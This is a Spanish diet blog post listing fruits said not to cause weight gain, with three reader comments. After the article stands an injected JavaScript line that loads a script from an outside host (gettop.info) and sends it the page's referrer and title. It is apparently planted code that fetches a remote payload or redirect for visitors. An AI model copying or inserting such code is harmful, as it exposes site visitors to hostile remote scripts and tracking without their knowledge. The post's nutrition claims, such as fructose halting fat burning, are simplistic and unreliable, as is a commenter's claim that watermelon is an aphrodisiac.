Salud y belleza » Alimentación, Salud, alimentos, dieta saludable

Descubre cuáles son las frutas que no engordan y disfruta comiéndolas

3 Comentarios

Cuando te apetezca algo dulce pero prefieras evitar la bollería y llevar una alimentación sana lo mejor son las frutas. Se recomienda comer varias piezas de frutas al día. Sin embargo, hay algunas frutas que engordan, así que será mejor que descubras cuáles son las frutas que no engordan para disfrutar aún más al comerlas.

frutas-no-engordan

Las frutas son innegablemente muy beneficiosas para la salud. Aportan vitaminas y minerales a nuestro organismo, además de fibras naturales. Son útiles para mejorar la digestión y desintoxicar el organismo.

comer-sandiaLas frutas ricas en fructosa, sin embargo, aumentan los niveles de insulina y no conviene comerlas en exceso porque el organismo deja de quemar grasa. Por eso es mejor que consumas si tienes ganas cualquiera de las siguientes frutas, que además te ayudarán a mantener la línea.

Las frutas que no engordan son las siguientes: limón, sandía, ciruelas, kiwis, melón, manzana verde, vayas, albaricoques, arándonos y durazno. Por el otro lado, algunas de las frutas que tienen alto contenido de azúcar son los cocos, plátanos, mango, cerezas, uvas y piña.

Si quieres mantener la línea y llevar una alimentación equilibrada ten presente esta lista de frutas que más y que menos engordan.

¿Cuál de estas frutas te gusta más? ¿Conoces alguna más que no engorde?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

3 Comments »

  • marina said:

    vaya por dios, justo ayer me comí toda una tarrina de cerezas pensando que estaba comiendo algo sano y a lo mejor solo estaba engordando más…

  • Eduardo said:

    yo como muchisima fruta un poco de todo, y creo que si dejas de comer el pan, los azucares, las grasas de origen animal, las freituras, puedes comer todas las frutas del mundo y nunca engordaras a no ser que tengas ya una tendencia obesa

  • belen said:

    Sandia tiene mucho beneficio, y ademas es muy afrodisíaca. en verano es el refresco perfecto y buena para el cuerpo

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.